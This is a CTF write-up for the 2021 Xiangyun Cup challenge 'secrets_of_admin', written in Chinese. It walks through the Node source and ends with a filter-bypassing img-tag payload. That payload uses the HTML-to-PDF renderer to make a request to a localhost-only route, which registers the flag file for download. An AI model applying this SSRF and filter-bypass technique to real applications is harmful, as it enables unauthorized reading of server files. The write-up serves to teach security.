[2021祥云杯]secrets_of_admin

已于 2023-11-23 23:03:20 修改
阅读量208 收藏
点赞数
文章标签: 数据库
于 2023-10-23 19:20:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64348326/article/details/133996904
版权

1.题目给了源码,简单看了一下,重点需要关注/routes/index.js中的三个路由和数据库执行文件database.ts即可

2.首先看到database.ts文件,一共两张表:users、files,其中users表中里面保存了admin用户的账号密码,另外再往files表中插入了一条文件数据,这里到下面再解析。

image-20231023183803511

3.利用给出的账号密码登陆admin账号,接下来看到router.post('admin')这个路由,checkAuth函数我们是已经通过校验的,因为我们账号并不是superuser/login路由就已经isadmin=1了。这个/admin路由主要看我们输入的数据content,它会先嵌入template中,再被packjson文件中安装的pdf包的toFile()方法转换为pdf文件,再写入到随机uuid的文件名内。

const checkAuth = (req: Request, res:Response, next:NextFunction) => {
    let token = req.signedCookies['token']
    if (token && token["username"]) {
        if (token.username === 'superuser'){
            next(createError(404)) // superuser is disabled since you can't even find it in database :)
        }
        if (token.isAdmin === true) {
            next();
        }
        else {
            return res.redirect('/')
        }
    } else {
        next(createError(404));
    }
}

image-20231023183626914

4.下面又调用了getCheckSum方法,该方法按照文件的哈希值生成了一段校验码。然后调用DB.create()方法将我们上传转换的pdf文件名和校验码给插入到数据表files中了。

const getCheckSum = (filename: string): Promise<string> => {
    return new Promise((resolve, reject) => {
        const shasum = crypto.createHash('md5');
        try {
            const s = fs.createReadStream(path.join(__dirname , "../files/", filename));
            s.on('data', (data) => {
                shasum.update(data)
            })
            s.on('end', () => {
                return resolve(shasum.digest('hex'));
            })
        } catch (err) {
            reject(err)
        }
    })
}

image-20231023184718140

5.接下来我们直接先看'/api/files/:id'路由,该路由首先会判断我们是否为superuser用户,接下来调用DB.getFile方法,根据我们的token中的用户admin和我们get中传递的校验码id在files表中查找相关信息,并取得文件名,在/files/目录下将文件给返回。这个时候就要联系上一步分析的/admin上传方法了,在这个路由,我们根本看不到我们之前输入的数据content转化成的pdf文件。因为以下两点:

  • 首先,校验码是转化后的pdf文件哈希值,这个我们根本不知道是什么。
  • 其次,一开始审计的时候注意到这一块插入files表并没有做预编译,但通过上面分析完结果才发现这三个参数都是固定死的。注意插入的数据库语句: await DB.Create('superuser', filename, checksum),也就是INSERT INTO files(username, filename, checksum) VALUES('superuser', {'uuid}.pdf', '{hash_value}');。这里固定死了是superuser用户,因此我们admin用户再怎么输入的数据转换的文件,都不可能被查询得到。
router.get('/api/files/:id', async (req, res) => {
    let token = req.signedCookies['token']
    if (token && token['username']) {
        if (token.username == 'superuser') {
            return res.send('Superuser is disabled now');   
        }
        try {
            let filename = await DB.getFile(token.username, req.params.id)
            if (fs.existsSync(path.join(__dirname , "../files/", filename))){
                return res.send(await readFile(path.join(__dirname , "../files/", filename)));
            } else {
                return res.send('No such file!');
            }
        } catch (err) {
            return res.send('Error!');
        }
    } else {
        return res.redirect('/');
    }
});

image-20231023185515309

6.其实我们下载的文件中,目录还有一条信息,那就是flag文件一开始就存在于/files/目录下的。而我们第一步开始分析的初始化时,往files表中插入的下面这条初始化的sql数据。尽管我们有可传递的flag文件校验码(该文件的哈希值),但是该文件所属的superuser用户根本不存在的。所以我们如果用admin用户的身份来传递这条校验码,也是在数据表files中查询不出数据的。

INSERT INTO files (username, filename, checksum) VALUES ('superuser','flag','be5a14a8e504a66979f6938338b0662c');`)

7.这个时候,最后看的那个路由/api/files就是破局的关键。当我们访问这个路由,并传递对应的参数,它就可以给我们往files表中插入一条自定义的数据。这里我们不但解决了校验码未知的问题,并且还解决了查询用户固定为superuser的问题,同时又能顺利读取/files/目录下flag文件。但是又有个问题,那就是这里需要本地127.0.0.1进行访问,也就是需要ssrf。

router.get('/api/files', async (req, res, next) => {
    if (req.socket.remoteAddress.replace(/^.*:/, '') != '127.0.0.1') {
        return next(createError(401));
    }
    let { username , filename, checksum } = req.query;
    if (typeof(username) == "string" && typeof(filename) == "string" && typeof(checksum) == "string") {
        try {
            await DB.Create(username, filename, checksum)
            return res.send('Done')
        } catch (err) {
            return res.send('Error!')
        }
    } else {
        return res.send('Parameters error')
    }
});

8.又回到了最开始/admin,我们唯一可利用的输入点就在那里。这里提一下,当我们把html文本转为pdf时,里面的script脚本文件会自动加载解析。也就是这里能触发xss,当我们构造一个图片src或者别的标签自定义弹窗时,就可以构造请求本地的/api/files了。

router.post('/admin', checkAuth, (req, res, next) => {
    let { content } = req.body;
    if ( content == '' || content.includes('<') || content.includes('>') || content.includes('/') || content.includes('script') || content.includes('on')){
        // even admin can't be trusted right ? :)  
        return res.render('admin', { error: 'Forbidden word 🤬'});
    } else {
        let template = `
        <html>
        <meta charset="utf8">
        <title>Create your own pdfs</title>
        <body>
        <h3>${content}</h3>
        </body>
        </html>
        `
        try {
            const filename = `${uuid()}.pdf`
            pdf.create(template, {
                "format": "Letter",
                "orientation": "portrait",
                "border": "0",
                "type": "pdf",
                "renderDelay": 3000,
                "timeout": 5000
            }).toFile(`./files/${filename}`, async (err, _) => {
                if (err) next(createError(500));
                const checksum = await getCheckSum(filename);
                await DB.Create('superuser', filename, checksum)
                return res.render('admin', { message : `Your pdf is successfully saved 🤑 You know how to download it right?`});
            });
        } catch (err) {
            return res.render('admin', { error : 'Failed to generate pdf 😥'})
        }
    }
});

9.这里有waf过滤了尖括号这些,参考别的文章可以用数组进行绕过。直接用img标签即可,试了一下meta标签,环境直接崩溃。

payload:content[]=<img+src%3D"http%3A//127.0.0.1:8888/api/files?username%3Dadmin%26filename%3Dflag%26checksum%3D666">

10.最后直接访问/api/files/666即可下载flag,后面试了script标签的window跳转和AJAX发送也是可以的。

光迹ovo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
_OceanofPDF.com_Smarter_Faster_Better__The_Secrets_of_Bein_-_Charles_Duhigg.pdf
03-27
Smarter_Faster_Better_
secrets_of_the_oracle_database
09-08
secrets_of_the_oracle_database
Secrets_for_All_the_Things:The_Injection_of_Secrets_for_Every
08-29
Secrets_for_All_the_Things:The_Injection_of_Secrets_for_Every_Application_in_Your_Cloud-Agnostic_Environment 安全 APT 业务风控 企业安全 安全人才
The_SECRETS_OF_POWER_NEGOTIATING_-_ROGER_DAWSON2.pdf
04-29
商务谈判中采用怎样的说话逻辑,如何再谈判之前进行有条理的准备。此书是一点一点粘贴复制的,并非扫描版。
Undocumented_Secrets_of_MATLAB_Java_Programming.part3
03-20
Undocumented_Secrets_of_MATLAB_Java_Programming.part3 Undocumented_Secrets_of_MATLAB_Java_Programming 第3部分(共3部分) http://undocumentedmatlab.com/books/matlab-java This book shows how using ...
流式数据库 RisingWave「Demo」:直播指标实时分析
最新发布
https://risingwave.com/
07-04 487
直播是目前最为流行的娱乐形式之一,本教程将分享如何使用开源流式数据库 RisingWave 监控直播指标。我们为本教程设置了一个演示集群,以便大家可以轻松尝试。
10.javaSE基础_JDBC编译程序(Driver+Statement+Connection+mysql数据库连接)
m0_61086522的博客
07-02 1078
JDBC是的缩写。它是Sun的Javasoft公司制定的Java数据库连接技术,是一套标准接口java.sql包中提供了JDBC API,通过它连接到各种数据库系统,编写访问数据库的程序。JDBC API不能直接访问数据库,它依赖于数据库厂商提供的JDBC Driver(JDBC驱动程序)
Redis数据迁移-RedisShake
青春年少不知疼的博客
06-28 444
redis-shake是阿里云Redis团队开源的用于Redis数据迁移和数据过滤的工具。一、基本功能redis-shake它支持解析、恢复、备份、同步四个功能恢复restore:将RDB文件恢复到目的redis数据库。备份dump:将源redis的全量数据通过RDB文件备份起来。解析decode:对RDB文件进行读取,并以json格式解析存储。同步sync:支持源redis和目的redis的数据同步,支持全量和增量数据的迁移,支持单节点、主从版、集群版之间的互相同步。
【学习笔记】Redis学习笔记——第4章 字典
Lchen_kk的博客
06-30 218
因为对hash太熟悉了(java中的HashMap),所以忽略了前面几段对于hash基础的讲解。
2023年全国职业院校技能大赛(高职组)“云计算应用”赛项赛卷9(容器云)
wangchuan_yyd的博客
06-29 619
2023年全国职业院校技能大赛(高职组)“云计算应用”赛项赛卷9(容器云)
QT学习积累——方法参数加const和不加const的区别
Arya的博客,专注后端领域
07-03 885
QT学习积累——方法参数加const和不加const的区别
015、HBase分布式数据库与传统数据库的深度对比
Code is fun.
06-30 1140
在大数据时代,选择合适的数据库系统至关重要。本文将深入探讨HBase分布式数据库与传统关系型数据库(如MySQL、Oracle)的区别,通过详细实例和研究成果分析两者的特点和适用场景。
电子科大数据库第四章:数据库设计与实现
m0_73672331的博客
07-04 454
一种面向用户的系统数据模型,用来描述现实世界的系统概念化数据结构。
mysql的前缀索引
weixin_43924419的博客
06-30 434
mysql的前缀索引
Springboot下使用Redis管道(pipeline)进行批量操作
weixin_45817985的博客
06-29 617
Springboot下使用Redis管道(pipeline)进行批量操作
浅谈如何在linux上部署java环境
m0_63191002的博客
06-29 1187
但是由于我的云服务器使用的版本是 centos7,比较老版,所以没有tomcat8.x系列,一般新版的服务器都会有的。而 openjdk 是开源社区维护的开源版本,所以虽然 oracle 官方的 jdk 和开源社区的 jdk 不是同一个东西,但是他们相差不大,并且功能相互兼容。当我们将自己的项目部署到云服务器上时,首先需要让云服务器上的数据库中含有自己项目对应的数据库、表。因为我们项目之前建的数据库、表是在本地的,项目部署到云服务器上就需要让项目访问的是云服务器上的数据库、表。
Redis高可用之持久化
weixin_62922268的博客
07-01 856
在web服务器中,高可用是指服务器可以正常访问的时间,衡量的标准是在多长时间内可以提供正常服务(99.9%、99.99%、99.999%等等)但是在Redis语境中,高可用的含义似乎要宽泛一些,除了保证提供正常服务( 如主从分离、快速容灾技术),还需要考虑数据容量的扩展、数据安全不会丢失等redis中大量缓存key集体过期大量请求访问redis和MySQL都不存在的资源redis中一个热点key过期,此时又有大量用户访问这个热点key(redis-cli --hotkeys 可用于查找热Key)
学习笔记——动态路由——OSPF(OSPF协议的工作原理)
灵韵的博客
06-28 775
(4)对方收到链路状态请求报文后,则会将其所缺少的链路状态项目的详细信息封装在链路状态更新报文(LSU)中发送回去。路由器并不是直接发送接收的链路状态更新报文,而是发送根据自己的数据库生成的链路状态更新报文。
ShardingSphere
Casual_Lei的博客
07-04 404
ShardingSphere 通过提供数据分片、分布式事务、数据加密和读写分离等功能,帮助开发者轻松构建高性能、高可用的分布式数据库系统。其灵活的架构设计和丰富的功能模块,使其成为现代分布式数据库中间件的优秀选择。
secrets_client,get_secret_value_response,SecretId=secret_name
06-13
这是使用 AWS SDK for Python (Boto3) 获取 AWS Secrets Manager 中的 secret 的代码行。其中,`secrets_client` 是一个 AWS Secrets Manager 的 client 对象,用来执行获取 secret 的操作;`SecretId` 参数指定了要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值